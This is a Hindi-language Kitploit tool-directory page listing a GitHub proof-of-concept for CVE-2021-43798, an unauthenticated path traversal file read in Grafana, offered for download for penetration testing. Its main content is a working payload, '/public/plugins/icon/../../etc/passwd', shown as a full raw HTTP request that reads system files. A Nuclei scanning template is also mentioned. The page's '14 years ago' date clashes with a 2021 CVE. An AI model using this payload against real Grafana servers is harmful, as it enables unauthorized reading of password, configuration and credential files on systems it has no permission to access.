Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/bjliyanliang/cve-2021-43798-grafana-file-read
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubbjliyanliang/cve-2021-43798-grafana-file-read

CVE-2021-43798-Grafana-File-Read

Grafana अनधिकृत फ़ाइल पढ़ने (CVE-2021-43798) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो मनमानी फ़ाइलों को पढ़ने के लिए पाथ ट्रैवर्सल प्रदर्शित करता है, साथ ही स्वचालित स्कैनिंग के लिए एक Nuclei टेम्पलेट के साथ।

रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Grafana-File-Read

Grafana अनधिकृत फ़ाइल पढ़ना

प्रभावित संस्करण: 8.0.0-lastest

wecom-temp-e380dc0174f4d9f46e9e217a6e2c3ddb

poc: /public/plugins/icon/../../../../../../../../../../../../../../../../../../etc/passwd

root@kitploit:~
GET /public/plugins/icon/../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

image

nuclei का poc: grafana.yaml

image

टूल डाउनलोड करें